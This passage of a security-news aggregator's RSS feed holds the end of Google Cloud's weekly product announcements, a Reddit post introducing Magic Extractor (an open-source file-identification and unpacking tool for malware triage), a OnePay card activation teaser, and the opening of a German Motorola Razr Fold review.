<li><strong>Master Your Launch: The Apigee Production Go-Live Checklist<br></strong>Ensure a secure launch with the Apigee production guide. Join Nicola Cardace on May 28 to explore security guardrails, including IAM roles, mTLS configurations, and encrypted KVM migrations. Scheduled at 11 AM EDT / 5 PM CEST to support EMEA and AMER teams, this TechTalk provides the technical roadmap you need to flip the switch with absolute confidence.<br><br><strong><a href="https://goo.gle/4elMCTI" rel="noopener" target="_blank">Register for the May 28 Community TechTalk</a></strong></li>
<li>
<p><strong>Transforming APIs into Governed Agentic Tools on the Google Cloud Agentic Platform<br></strong><span>Turn your APIs into secure, governed agentic tools on the Google Cloud Agentic Platform. Join Specialist Christophe Lalevée on May 7 for a technical deep dive into AI productization. Scheduled at 5 PM CEST / 11 AM EDT to maximize coverage for developers across EMEA and AMER, this session explores the integration and governance frameworks required to scale enterprise-ready AI with confidence.</span></p>
<p><a href="https://goo.gle/3PfWm7M" rel="noopener" target="_blank">Register for the May 7 Community TechTalk</a></p>
</li>
<li><a href="https://docs.cloud.google.com/compute/docs/accelerator-optimized-machines#g4-machine-types" rel="noopener" target="_blank">Fractional G4 VMs</a> are Generaly Available, providing a highly efficient and cost-effective entry point for AI and graphics workloads. These new configurations, using NVIDIA virtual GPU (vGPU) technology, allow you to leverage the power of the NVIDIA RTX PRO 6000 Blackwell Server Edition GPUs in flexible, smaller increments, so you can right-size your infrastructure to match the specific demands of your applications. By providing more granular access to advanced hardware, fractional G4 VMs let you optimize resource allocation and reduce overhead without sacrificing performance. You can now select from additional GPU slice sizes for your specific needs:
<ul>
<li><strong>1/2 GPU:</strong> Ideal for more intensive tasks such as LLM inference, robotics sensor simulation, and high-fidelity 3D rendering.</li>
<li><strong>1/4 GPU:</strong> Optimized for mainstream workloads, including mid-range creative design, video transcoding, and real-time data visualization.</li>
<li><strong>1/8 GPU:</strong> Great for lightweight applications such as remote desktops, productivity tools, and entry-level streaming services.</li>
</ul>
</li>
<li>
<p>Transitioning AI from a sandbox prototype to an enterprise-grade system is a major hurdle. A monolithic script won't suffice for widespread deployment. To achieve true scale and reliability with Gemini, organizations must adopt service-oriented micro-agent architectures, establish Zero-Trust security, and implement rigorous EvalOps. Master the "Agentic Maturity Ladder" to ensure your AI &amp; Agentic solutions are robust, secure, and ready for the real world.</p>
<p><a href="https://lnkd.in/gHBH8cTv" rel="noopener" target="_blank">Watch the deep dive</a> and <a href="https://discuss.google.dev/t/beyond-the-prototype-scaling-production-grade-agents-with-gemini/356140" rel="noopener" target="_blank">read the developer blog</a> to learn more.</p>
</li>
<li><strong>ML Development in VS Code with Google Cloud Power: Workbench Extension Now Available<br></strong>Data scientists and developers can now combine the local productivity of VS Code with the scalable infrastructure of Google Cloud. The new Google Cloud Workbench Notebooks extension allows you to connect to and run notebooks on managed cloud environments directly within your local IDE. This integration streamlines the ML lifecycle by eliminating context switching and providing high-performance compute for complex workloads in a familiar interface. As part of our commitment to the developer ecosystem, the extension is fully open-sourced to support community-driven innovation.
<ul>
<li><strong>Install from Marketplace:</strong> <a href="https://marketplace.visualstudio.com/items?itemName=GoogleCloudTools.workbench-notebooks" rel="noopener" target="_blank">GoogleCloudTools.workbench-notebooks</a></li>
<li><strong>Contribute on GitHub:</strong> <a href="https://github.com/GoogleCloudPlatform/colab-enterprise-vscode" rel="noopener" target="_blank">colab-enterprise-vscode</a></li>
</ul>
</li>
</ul>
<h3 data-draftjs-conductor-fragment='{"blocks":[{"key":"865rk","text":"Week of Dec 16 - Dec 20","type":"header-three","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}}],"entityMap":{}}'>Apr 20 - Apr 24</h3>
<ul>
<li><strong>Announcing the 2026 Google Cloud Partners of the Year<br></strong>Google Cloud is honored to celebrate the winners of the 2026 Partner of the Year awards! These awards recognize an exceptional group of partners across AI, Security, Infrastructure, and more, who have demonstrated a commitment to customer success. From global system integrators to specialized startups, these winners are leveraging the power of Google Cloud to solve complex challenges and drive digital transformation worldwide. Join us in congratulating these organizations for their innovation, collaboration, and impactful results over the past year.<br><br>See the <a href="https://cloud.google.com/blog/topics/partners/2026-partners-of-the-year-winners-next26">2026 Partner Award winners</a></li>
</ul>
<h3 data-draftjs-conductor-fragment='{"blocks":[{"key":"865rk","text":"Week of Dec 16 - Dec 20","type":"header-three","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}}],"entityMap":{}}'>Apr 13 - Apr 17</h3>
<ul>
<li>We're excited to announce the <strong>Public Preview of Datastream’s metadata integration with Knowledge Catalog</strong>. This is the first step in our vision to provide a centralized, "single pane of glass" for all Datastream assets. The enhancement automatically synchronizes Streams, Connection Profiles, and Private Connections, eliminating data silos. It enhances discoverability, allowing you to search for Datastream assets using the same interface as BigQuery tables. Centralized governance is also provided, making your real-time data estate more transparent and easier to manage.</li>
<li><strong>Upgrading Apigee OPDK to 4.53 with OS Modernization<br></strong>Modernize your infrastructure using Google’s official, sequential upgrade path. Our Technical expert, Rakesh Talanki outlines how to upgrade Apigee OPDK to v4.53 while migrating to a supported OS (RHEL 8.x/9.x). This guide covers the "build-out" methodology, including multi-data center syncing, to ensure a stable, zero-downtime transition<br><br><a href="https://goo.gle/3Oa8uqy" rel="noopener" target="_blank">Read the guide</a></li>
<li><strong>Cloud Run Worker Pools and CREMA: Powering Serverless AI at Scale<br></strong>Google Cloud has announced the General Availability of <strong>Cloud Run worker pools</strong>, a new resource type designed specifically for pull-based, non-HTTP workloads. Unlike traditional Cloud Run services that scale based on request traffic, worker pools provide an "always-on" environment for background tasks like processing message queues or running large-scale AI inference. To support this, Google Cloud also open-sourced the <strong>Cloud Run External Metrics Autoscaler (CREMA)</strong>. Built on KEDA, CREMA enables queue-aware autoscaling for worker pools, allowing them to dynamically scale based on external signals like Pub/Sub backlog or Kafka lag.</li>
<li><strong>Apigee Model Context Protocol (MCP) now Generally Available<br></strong>Expose enterprise APIs as MCP tools for agentic AI applications with the General Availability of MCP in Apigee. This update allows developers to transform APIs into AI-ready tools using OpenAPI Specifications, removing the need for local MCP servers or additional infrastructure. With managed endpoints and semantic search in API hub, you can now provide AI agents with secure, governed access to enterprise data at scale.<br><br><a href="https://goo.gle/3QfoEQ4" rel="noopener" target="_blank"><em>Explore the MCP overview</em></a></li>
</ul>
<h3 data-draftjs-conductor-fragment='{"blocks":[{"key":"865rk","text":"Week of Dec 16 - Dec 20","type":"header-three","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}}],"entityMap":{}}'>Apr 6 - Apr 10</h3>
<ul>
<li><strong>Community TechTalk: Powering Retail Agents with ADK, UCP &amp; Apigee X<br></strong>Move beyond basic chatbots to secure, transactional AI experiences. Join our Community TechTalk on April 16 to learn how Apigee X and Gemini build a "Trust Layer" for AI shopping assistants using UCP standards. We’ll demonstrate how to block prompt injections with Model Armor and implement cost governance via token limits to secure the path from discovery to purchase.<br><br><a href="https://goo.gle/41ocUgq" rel="noopener" target="_blank"><span>Register for the TechTalk</span></a></li>
<li><strong>Implement multimodal capabilities in your AI agents<br></strong>Explore three new reference architectures for building sophisticated multi-agent AI systems that can process and analyze multimodal data. To analyze disparate multimodal data and produce a high-confidence classification, see <a href="https://docs.cloud.google.com/architecture/agentic-ai-classify-multimodal-data"><span>Classify multimodal data</span></a><span>. To create a fluid conversational AI that processes audio and video streams in real time, see</span> <a href="https://docs.cloud.google.com/architecture/agentic-ai-bidirectional-multimodal-streaming"><span>Enable live bidirectional multimodal streaming</span></a><span>. To consolidate fragmented multimodal data into a searchable knowledge graph, see</span> <a href="https://docs.cloud.google.com/architecture/agentic-ai-multimodal-graph-rag-resource-orchestration"><span>Multimodal GraphRAG resource orchestration</span></a><span>.</span></li>
<li><strong>Automate SecOps workflows with an agentic AI system<br></strong>To accelerate incident response and reduce manual toil for your security team, you need a system that can automate remediation playbooks. Our new reference architecture helps you build an AI agent that orchestrates complex triage and investigation workflows across disparate security tools, such as SIEM, CSPM, and EDR, from a single interface. See the full guide to <a href="https://docs.cloud.google.com/architecture/agentic-ai-orchestrate-security-ops-workflows"><span>orchestrate security operations workflows</span></a><span>.</span></li>
</ul>
<h3 data-draftjs-conductor-fragment='{"blocks":[{"key":"865rk","text":"Week of Dec 16 - Dec 20","type":"header-three","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}}],"entityMap":{}}'>Mar 30 - Apr 3</h3>
<ul>
<li><strong>ASEAN Webinar | April 30: Mastering Agentic Governance at Scale with GCP<br></strong>As AI agents move from experimental pilots to core enterprise functions, governance is the critical next step. Join Google Cloud experts <strong>Shilpi Puri &amp; Wely Lau</strong> for a <strong>webinar</strong> on <strong>April 30th at 11:00 AM SGT</strong> to learn how to architect a secure AI Management layer. We’ll explore developing governed MCP endpoints, managing tool access to enterprise data, and operationalizing AI with robust audit logs. The session includes a live demo of these frameworks in action on Google Cloud.<br><br><a href="https://goo.gle/47FX1Wn" rel="noopener" target="_blank"><strong>RSVP here.</strong></a></li>
</ul>
<h3 data-draftjs-conductor-fragment='{"blocks":[{"key":"865rk","text":"Week of Dec 16 - Dec 20","type":"header-three","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}}],"entityMap":{}}'>Mar 23 - Mar 27</h3>
<ul>
<li aria-level="1">
<p role="presentation"><strong>Turn your API sprawl into an agent-ready catalog<br></strong><span>As organizations scale, APIs often become scattered across multiple gateways, creating "blind spots" that hinder AI adoption. To solve this, we’ve introduced two new capabilities for Apigee API hub: a new integration with API Gateway to automatically centralize API metadata into a single control plane, and a specification boost add-on (now in public preview). This add-on uses AI to enhance your API documentation with the precise examples and error codes that AI agents need to function reliably.<br><br></span><a href="https://goo.gle/47dEYqc" rel="noopener" target="_blank"><span>Read the full blog post to get started.</span></a></p>
</li>
<li aria-level="1">
<p role="presentation"><strong>Webinar | April 16: AI Command &amp; Control<br></strong><span>As AI agents move from experimental pilots to core enterprise functions, governance is the critical next step. Join Google Cloud expert Satyam Maloo for a webinar on April 16th at 11:00 AM IST to learn how to architect a secure AI Management layer. We’ll explore developing governed MCP endpoints, managing tool access to enterprise data, and operationalizing AI with robust audit logs. The session includes a live demo of these frameworks in action on Google Cloud.<br><br></span><a href="https://goo.gle/4t43Vg4" rel="noopener" target="_blank"><span>RSVP here.</span></a></p>
</li>
<li aria-level="1">
<p role="presentation"><strong>Modernizing and Decoupling Event Ingestion with Apigee<br></strong><span>In modern cloud-native architectures, decoupling producers from consumers is critical for building resilient systems. While Google Cloud Pub/Sub provides a scalable backbone, exposing it directly to external clients can introduce security and management overhead. This new guide explores how to leverage Apigee as an intelligent HTTP ingestion point. Learn how to handle security, mediation, and traffic control before messages reach your internal bus using the PublishMessage policy or Pub/Sub API.</span><br><br><a href="https://goo.gle/3POgsWF" rel="noopener" target="_blank"><span>Read the full guide.</span></a></p>
</li>
</ul>
<h3 data-draftjs-conductor-fragment='{"blocks":[{"key":"865rk","text":"Week of Dec 16 - Dec 20","type":"header-three","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}}],"entityMap":{}}'>Mar 16 - Mar 20</h3>
<ul>
<li><strong>Gemini-powered Assistant in BigQuery Studio Gets Context-Aware Upgrades<br></strong>The Gemini-powered assistant in BigQuery Studio has been transformed into a fully context-aware analytics partner, supporting your entire data lifecycle. The new capabilities include intelligent resource discovery, which uses Dataplex Universal Catalog search to find resources across projects and deep dive into metadata using natural language. You can now automate tasks, such as scheduling production-grade queries directly through the chat interface, and instantly troubleshoot long-running or failed jobs with root cause analysis and cost control auditing.<br><br><a href="https://docs.cloud.google.com/bigquery/docs/use-cloud-assist">Explore</a> the full range of what the assistant can do.</li>
</ul>
<h3 data-draftjs-conductor-fragment='{"blocks":[{"key":"865rk","text":"Week of Dec 16 - Dec 20","type":"header-three","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}}],"entityMap":{}}'>Mar 9 - Mar 13</h3>
<ul>
<li>
<div><strong>Want to use Gemini to develop code and don't know where to start?</strong><br>This <a href="https://medium.com/google-cloud/supercharge-your-spark-development-with-gemini-1540f1cb47d4" rel="noopener" target="_blank">article</a> includes a couple of examples of developing code with Gemini prompts; it identified changes that were needed to be made to get the code working. The article also refers to other examples that are available on github. </div>
</li>
</ul>
<h3 data-draftjs-conductor-fragment='{"blocks":[{"key":"865rk","text":"Week of Dec 16 - Dec 20","type":"header-three","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}}],"entityMap":{}}'>Mar 2 - Mar 6</h3>
<ul>
<li>
<p><span><strong>Introducing Gemini 3.1 Flash-Lite, our fastest and most cost-efficient Gemini 3 series model.</strong> Built for high-volume developer workloads at scale, 3.1 Flash-Lite delivers high quality for its price and model tier. Gemini 3.1 Flash-Lite can tackle tasks at scale, like high-volume translation and content moderation, where cost is a priority. And it can also handle more complex workloads where more in-depth reasoning is needed, like generating user interfaces and dashboards, creating simulations or following instructions.</span></p>
<p><span>Starting today, 3.1 Flash-Lite is rolling out in preview to enterprises via </span><a href="https://console.cloud.google.com/vertex-ai/studio/multimodal?mode=prompt&amp;model=gemini-3.1-flash-lite-preview"><span>Vertex AI</span></a><span> and </span><span>developers via the Gemini API in </span><a href="https://aistudio.google.com/prompts/new_chat?model=gemini-3.1-flash-lite-preview" rel="noopener" target="_blank"><span>Google AI Studio</span></a><span>.</span></p>
</li>
<li>
<div>
<p><strong>TechTalk: Implementing Device Authorization Grant (RFC 8628) for Apigee</strong><br>Learn how to authorize "headless" devices like Smart TVs or AI agents that lack keyboards and browsers. Join our Community TechTalk on March 19 (5PM CET / 12PM EDT) to go under the hood of Apigee X/Hybrid. We’ll cover the real-world mechanics of state management, polling, and human-in-the-loop security patterns for devices and autonomous agents.</p>
<p><a href="https://goo.gle/4r6o6Zi" rel="noopener" target="_blank">Register for the TechTalk</a></p>
</div>
</li>
</ul>
<h3 data-draftjs-conductor-fragment='{"blocks":[{"key":"865rk","text":"Week of Dec 16 - Dec 20","type":"header-three","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}}],"entityMap":{}}'>Feb 23 - Feb 27</h3>
<ul>
<li>
<p><span><strong>Pro-level image generation gets faster and more accessible with Nano Banana 2<br></strong></span><span>Nano Banana 2 is our state-of-the-art image generation and editing model. It delivers Pro-level image generation and editing at the speed you expect from Flash — making the quality, reasoning, and world knowledge you loved about Nano Banana Pro more accessible. Learn more about the model </span><a href="https://blog.google/innovation-and-ai/technology/ai/nano-banana-2" rel="noopener" target="_blank"><span>here</span></a><span>.</span></p>
</li>
</ul>
<ul>
<li>
<p><strong>The Intelligent Path to Compliance: Transforming Regulatory QC with Google Cloud<br></strong><span>Reducing "Refuse to File" (RTF) risks and submission cycle times is critical for life sciences leaders. Google Cloud’s Regulatory Submission Semantic QC Auditor leverages Gemini and RAG architecture to transform Quality Control from a manual burden into an active, intelligent workflow.</span></p>
<p><span>By automating semantic cross-referencing, narrative coherence checks, and dynamic guidance-based auditing, this solution ensures rigorous accuracy and auditability. Operating within a secure GxP-ready environment, it empowers teams to detect subtle inconsistencies and generate remediation plans without sacrificing data privacy. <br><br></span><a href="https://discuss.google.dev/t/the-intelligent-path-to-compliance-transforming-regulatory-quality-control-with-google-cloud/335276" rel="noopener" target="_blank"><span>Learn more</span></a><span>.</span></p>
</li>
<li><span><span>Stop typing, start interacting! <strong>The Gemini Live Agent Challenge is here</strong>. Build immersive agents that can help you see, hear, and speak using Gemini and Google Cloud. Compete for your share of $80,000+ in prizes and a trip to Google Cloud Next '26!<br><br></span><span>Submissions are open from February 16, 2026 to March 16, 2026. Learn more and register at </span><a href="http://geminiliveagentchallenge.devpost.com/" rel="noopener" target="_blank"><span>geminiliveagentchallenge.devpost.com</span></a></span></li>
</ul>
<h3 data-draftjs-conductor-fragment='{"blocks":[{"key":"865rk","text":"Week of Dec 16 - Dec 20","type":"header-three","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}}],"entityMap":{}}'>Feb 9 - Feb 13</h3>
<ul>
<li>
<p><strong><span>Introducing Gemini 3.1 Pro on Google Cloud. </span></strong></p>
<span>3.1 Pro is a noticeably smarter, more capable baseline for complex problem-solving. We’re shipping 3.1 Pro at scale, building upon our </span><a href="https://cloud.google.com/blog/products/ai-machine-learning/gemini-3-is-available-for-enterprise?e=48754805"><span>goal</span></a><span> to help you transform your business for the agentic future. Learn more about the model’s capabilities </span><a href="https://blog.google/innovation-and-ai/models-and-research/gemini-models/gemini-3-1-pro" rel="noopener" target="_blank"><span>here</span></a><span>. Gemini 3.1 Pro is available starting today in preview in </span><a href="https://cloud.google.com/vertex-ai?e=48754805"><span>Vertex AI</span></a><span> and </span><a href="https://cloud.google.com/gemini-enterprise?e=48754805"><span>Gemini Enterprise</span></a><span>. Developers can access the model in preview via the Gemini API in </span><a href="https://aistudio.google.com/prompts/new_chat?model=gemini-3.1-pro-preview" rel="noopener" target="_blank"><span>Google AI Studio</span></a><span>, </span><a href="https://developer.android.com/studio" rel="noopener" target="_blank"><span>Android Studio</span></a><span>, </span><a href="https://antigravity.google/blog/gemini-3-1-in-google-antigravity" rel="noopener" target="_blank"><span>Google Antigravity</span></a><span>, and </span><a href="https://geminicli.com/" rel="noopener" target="_blank"><span>Gemini CLI</span></a><span>.<br><br></span></li>
<li><strong>Automate Storage Compatibility with GKE Dynamic Default Storage Classes<br></strong>Managing storage across mixed-generation VM clusters in GKE just got easier. With the new <strong>Dynamic Default Storage Class</strong>, Google Kubernetes Engine automatically selects between Persistent Disk (PD) and Hyperdisk based on a node's specific hardware compatibility. This abstraction eliminates the need for complex scheduling rules and manual pairing, ensuring your volumes "just work" regardless of the underlying infrastructure. By defining both variants in a single class, you reduce operational overhead while maintaining peak performance and cost-efficiency across your entire cluster.<br><br><a href="https://docs.cloud.google.com/kubernetes-engine/docs/concepts/hyperdisk#automated_disk_type_selection" rel="noopener" target="_blank">Explore automated disk type selection</a></li>
<li>
<p><strong>Community TechTalk: AI-Powered Apigee Development with strofa.io<br></strong><strong>Join the Apigee community on February 26</strong><span> for a deep dive into</span> <a href="https://www.google.com/search?q=http://strofa.io" rel="noopener" target="_blank"><span>strofa.io</span></a><span>. Guest speaker Denis Kalitviansky will demonstrate how this new AI-powered tool automates and orchestrates Apigee development, from local emulators to large-scale hybrid environments. Discover how to scale your API management and streamline team collaboration using the latest in AI-driven automation.</span></p>
<p><a href="https://goo.gle/3Oerns3" rel="noopener" target="_blank"><span>Register now to reserve your spot.</span></a></p>
</li>
</ul>
<h3 data-draftjs-conductor-fragment='{"blocks":[{"key":"865rk","text":"Week of Dec 16 - Dec 20","type":"header-three","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}}],"entityMap":{}}'>Jan 26 - Jan 30</h3>
<ul>
<li><strong><span>Simplify API Governance with Native OpenAPI v3 Support<br></span></strong>Eliminate integration debt and accelerate deployment velocity with the General Availability of OpenAPI v3 (OASv3) support for API Gateway and Cloud Endpoints. You no longer need to downgrade modern specifications to OASv2. Instead, you can now define API contracts and enforce critical policies—including telemetry, quotas, and security—using native Google-specific extensions directly within your OASv3 files. This update ensures your APIs are secure by design while remaining fully compatible with the modern developer ecosystem and Google Cloud’s AI services.<br><br><a href="https://goo.gle/49Wx58Z" rel="noopener" target="_blank"><span>Get started with OpenAPI v3 on API Gateway and Cloud Endpoints.</span></a></li>
</ul>
<ul>
<li><strong><span>Accelerate API Testing with the New Open Source API Tester<br></span></strong>Start validating your APIs with API Tester, a simple, YAML-based Test Driven Development (TDD) framework. Designed for the Apigee community, this tool allows you to write human-readable tests, run them instantly via a web client or CLI, and perform deep unit testing on Apigee proxies. With native support for JSONPath assertions and Apigee shared flows, you can verify everything from payload data to internal variables like <code>proxy.basepath</code><span> without leaving your terminal.<br><br></span><a href="https://goo.gle/4q5WDGK" rel="noopener" target="_blank"><span>Explore the API Tester guide and start testing your proxies today.</span></a></li>
<li><strong><span>Secure Sensitive Data with Kubernetes Secrets in Apigee hybrid<br></span></strong>Enhance security in Apigee hybrid by accessing Kubernetes Secrets directly within your API proxies. This hybrid-exclusive feature keeps sensitive credentials within your cluster boundary and prevents replication to the management plane. It supports strict separation of duties: operators manage secrets via <code>kubectl</code><span>, while developers reference them as secure flow variables—ideal for high-compliance and GitOps workflows.<br><br></span><a href="https://goo.gle/4qEVffo" rel="noopener" target="_blank"><span>Implement Kubernetes Secrets in your hybrid proxies.</span></a></li>
<li><strong><span>See the Console in a Whole New Light: Dark Mode is Now Generally Available in Google Cloud<br></span></strong>Elevate your cloud management workflow with Dark Mode, now generally available in the Google Cloud console. We have delivered a modern, cohesive, and accessible experience reimagined for maximum comfort and productivity—especially during extended working hours and low-light environments. Dark Mode can be enabled automatically based on your operating system's preference, or manually through the Settings  -&gt; Appearance menu.<br><br><a href="https://docs.cloud.google.com/docs/get-started/console-appearance"><span>Switch to Dark Mode today to enjoy a modern, comfortable, and productive environment!</span></a></li>
<li><strong><span>Apigee X Networking: PSC or VPC Peering?<br></span></strong>Deciding how to connect Apigee X? Watch this video to compare Private Service Connect and VPC Peering. We break down northbound and southbound routing, IP consumption, and how to reach targets on-prem or in the cloud. Learn to simplify your architecture and avoid common networking "gotchas" for a smoother deployment.<br><br><a href="https://goo.gle/4bWBGdV" rel="noopener" target="_blank"><span>Watch the video.</span></a></li>
</ul>
<h3 data-draftjs-conductor-fragment='{"blocks":[{"key":"865rk","text":"Week of Dec 16 - Dec 20","type":"header-three","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}}],"entityMap":{}}'>Jan 19 - Jan 23</h3>
<ul>
<li><strong>Bridge the Gap: Excel-to-API Conversion in Apigee Portals<br></strong><span>Give your customers more ways to connect! This new article by Tyler Ayers explores how to extend the Apigee Integrated Portal to support direct Excel file uploads. By leveraging SheetJS and custom portal scripts, you can enable users to upload spreadsheets, preview data, and submit it directly to your APIs, all without writing a single line of integration code themselves. It’s a powerful way to simplify onboarding for those who aren't yet API-ready.<br><br></span><a href="https://goo.gle/3Nq3Pjo" rel="noopener" target="_blank"><span>Learn how to build it</span></a><span>.</span></li>
<li><strong>Elevate your applications with Firestore’s new advanced query engine<br></strong><span>We have fundamentally reimagined Firestore with pipeline operations for Enterprise edition. Experience a powerful new engine featuring over a hundred new query features, index-less queries, new index types, and observability tooling to improve query performance. Seamlessly migrate using built-in tools and leverage Firestore’s existing differentiated serverless foundation, virtually unlimited scale, and industry-leading SLA. Join a community of 600K developers to craft expressive applications that maximize the benefits of rich queryability, real-time listen queries, robust offline caching, and cutting-edge AI-assistive coding integrations.<br><br></span><a href="https://cloud.google.com/blog/products/data-analytics/new-firestore-query-engine-enables-pipelines?e=48754805"><span>Learn more about Firestore pipeline operations.</span></a></li>
</ul></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[[Tool] Magic Extractor — identify and unpack unknown files, installers and embedded payloads on Windows]]></title>
<description><![CDATA[I wanted a Windows-friendly alternative to tools such as Binwalk and UniExtract, focused on identifying unknown files and automatically choosing the appropriate extraction method. That idea eventually became Magic Extractor, an open-source utility intended to help with static triage and the initi...]]></description>
<link>https://tsecurity.de/de/3662625/malware-trojaner-viren/tool-magic-extractor-identify-and-unpack-unknown-files-installers-and-embedded-payloads-on-windows/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3662625/malware-trojaner-viren/tool-magic-extractor-identify-and-unpack-unknown-files-installers-and-embedded-payloads-on-windows/</guid>
<pubDate>Sun, 12 Jul 2026 04:18:02 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>I wanted a Windows-friendly alternative to tools such as Binwalk and UniExtract, focused on identifying unknown files and automatically choosing the appropriate extraction method.</p> <p>That idea eventually became <strong>Magic Extractor</strong>, an open-source utility intended to help with static triage and the initial unpacking of suspicious samples.</p> <p>It can be useful for:</p> <ul> <li>Identifying files whose extension is missing or misleading</li> <li>Unpacking installers, SFX archives and uncommon compression formats</li> <li>Extracting nested archives recursively</li> <li>Listing contents without extraction</li> <li>Carving archives and payloads embedded at arbitrary offsets</li> <li>Trying multiple handlers when detection is ambiguous</li> </ul> <p>Detection combines PureMagic, custom magic signatures, Detect It Easy, Binwalk and Magika. The detected type is then routed to the appropriate bundled extractor.</p> <p>Example:</p> <p><code>magic-extractor identify suspicious.bin</code></p> <p><code>magic-extractor extract suspicious.bin --recursive</code></p> <p><code>magic-extractor carve firmware.bin --list</code></p> <p>It currently supports more than 80 formats, including archives, installers, disk images, forensic images and embedded content.</p> <p>This is not a malware detector, sandbox or replacement for dynamic analysis. It is mainly intended as a supporting tool for file identification, unpacking and static analysis workflows.</p> <p>GitHub:</p> <p><a href="https://github.com/xchwarze/magic-extractor">https://github.com/xchwarze/magic-extractor</a></p> <p>Feedback from malware analysts and reverse engineers would be especially useful, particularly regarding formats, packers or installers that are currently difficult to extract.</p> <p>As always, suspicious files should only be handled inside an isolated analysis environment.</p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/xchwarze"> /u/xchwarze </a> <br> <span><a href="https://github.com/xchwarze/magic-extractor">[link]</a></span>   <span><a href="https://www.reddit.com/r/MalwareAnalysis/comments/1uu1rni/tool_magic_extractor_identify_and_unpack_unknown/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[www.onepay.com Activate Card: How to Activate Your OnePay Card]]></title>
<description><![CDATA[Key TakeawaysTo activate your OnePay card, whether it's a debit, credit, replacement, or retail card from Walmart, you need to visit the www.onepay.com Activate Card page or use the OnePay mobile app. Each card type might have a specific activation process, so make sure you use the correct one.Ac...]]></description>
<link>https://tsecurity.de/de/3661308/it-security-nachrichten/wwwonepaycom-activate-card-how-to-activate-your-onepay-card/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3661308/it-security-nachrichten/wwwonepaycom-activate-card-how-to-activate-your-onepay-card/</guid>
<pubDate>Sat, 11 Jul 2026 07:22:03 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Key TakeawaysTo activate your OnePay card, whether it's a debit, credit, replacement, or retail card from Walmart, you need to visit the www.onepay.com Activate Card page or use the OnePay mobile app. Each card type might have a specific activation process, so make sure you use the correct one.Activation involves logging into your OnePay account, […]</p>
<p>The post <a href="https://itechhacks.com/onepay-com-activate-card/" data-wpel-link="internal">www.onepay.com Activate Card: How to Activate Your OnePay Card</a> appeared first on <a href="https://itechhacks.com/" data-wpel-link="internal">iTech Hacks</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Motorola Razr Fold im Test: Luxuriöses Foldable mit wenigen Schwächen]]></title>
<description><![CDATA[Jon Mundy / Foundry



Auf einen Blick



Pro




Hochwertiges Design mit angenehmer Haptik



Sehr gutes Kamerasystem



Große, leuchtstarke Displays



Solide Akkulaufzeit und schnelles Aufladen




Kontra




Relativ klobig



Stiftfunktion nicht optimal umgesetzt



Leistung nicht auf Spitzen...]]></description>
<link>https://tsecurity.de/de/3661206/it-security-nachrichten/motorola-razr-fold-im-test-luxurioeses-foldable-mit-wenigen-schwaechen/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3661206/it-security-nachrichten/motorola-razr-fold-im-test-luxurioeses-foldable-mit-wenigen-schwaechen/</guid>
<pubDate>Sat, 11 Jul 2026 06:06:36 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Bildschirmfoto-2026-07-09-um-19.34.45.png?w=1024" alt="Motorola Razr Fold" class="wp-image-4195177" width="1024" height="582" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Jon Mundy / Foundry</p></div>



<h2 class="wp-block-heading">Auf einen Blick</h2>



<h3 class="wp-block-heading">Pro</h3>



<ul class="wp-block-list">
<li>Hochwertiges Design mit angenehmer Haptik</li>



<li>Sehr gutes Kamerasystem</li>



<li>Große, leuchtstarke Displays</li>



<li>Solide Akkulaufzeit und schnelles Aufladen</li>
</ul>



<h3 class="wp-block-heading">Kontra</h3>



<ul class="wp-block-list">
<li>Relativ klobig</li>



<li>Stiftfunktion nicht optimal umgesetzt</li>



<li>Leistung nicht auf Spitzenniveau</li>
</ul>



<h3 class="wp-block-heading">Fazit</h3>



<p>Motorola bleibt seinem Stil auch bei den großen Foldables treu und liefert ein überzeugendes Gesamtpaket. Das Smartphone muss den Vergleich mit der Konkurrenz nicht scheuen und punktet mit einem gelungenen Design, starken Kameras und einer guten Akkulaufzeit.</p>



<p>Motorola hat sich einen ungewöhnlichen Zeitpunkt für den Marktstart seines ersten Foldables im Buchformat ausgesucht. Die hohen Preise für wichtige Komponenten bremsen derzeit selbst die größten Smartphone-Hersteller aus und treiben die Verkaufspreise in die Höhe. Gleichzeitig könnte Apple mit dem erwarteten <a href="https://www.macwelt.de/article/2644662/iphone-fold-alles-was-wir-bisher-wissen.html" target="_blank">iPhone Ultra</a> die Kategorie der Foldables schon bald neu definieren.</p>



<p>Dabei hätte man eigentlich erwarten können, dass Motorola in diesem Bereich eine Vorreiterrolle einnimmt. Schließlich hat das Unternehmen mit der Razr-Serie ab 2020 das moderne Klapp-Smartphone entscheidend mitgeprägt.</p>



